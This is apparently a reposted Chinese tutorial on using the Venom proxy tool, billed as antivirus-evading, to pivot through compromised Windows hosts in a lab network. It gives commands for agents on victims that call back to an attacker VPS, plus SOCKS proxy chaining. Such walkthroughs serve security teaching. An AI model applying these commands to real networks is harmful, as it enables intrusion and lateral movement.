https://github.com/Dliv3/Venom
我们最终要在 victim1 上建立一级代理,在 victim2 上建立二级代理 , 然后才能访问到 victim3
环境
拿下 victim1 的shell有台vps还有你的笔记本
一级代理
在 vps ( kali ) 上 , 上传 admin 端
./admin_linux_x64 -lport 9999 -passwd mhx在 Victim1 ( win2008) 上 , 上传 agent 端
./agent.exe -rhost VPS_ip -rport 9999 -passwd mhxagent.exe -rhost 192.168.6.157 -rport 9999 -passwd mhxOCVhTxAOgL.exe -rhost 119.3.12.54 -rport 9999 -passwd mhx
设置socks代理
goto 1socks 7777
然后设置全局代理 192.168.6.157:7777 , 访问 10.10.10.4/phpinfo.php
在一级代理下,我们也很顺利地访问到 victim2 ( win7 ) , 然后getshell
二级代理
在节点1上开启监听 , 本质上就是通过agent , 在win2008开启监听 , 等待win7链接
goto 1listen 9998
接下来就是把 agent 上传到 win7 , 链接刚才的监听
agent64.exe -rhost 10.10.10.3 -rport 9998 -passwd mhx
然后去节点2上开启 socks , 然后配置全局代理,即可访问 victim3 ( win2012 )
goto 2socks 6666
然后设置全局代理 192.168.6.157:6666, 访问 http://10.10.11.5:8080
工具下载
https://github.com/Dliv3/Venom
原文始发于微信公众号(Sec探索者):360+火绒免杀版内网多级代理工具(Venom毒液)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论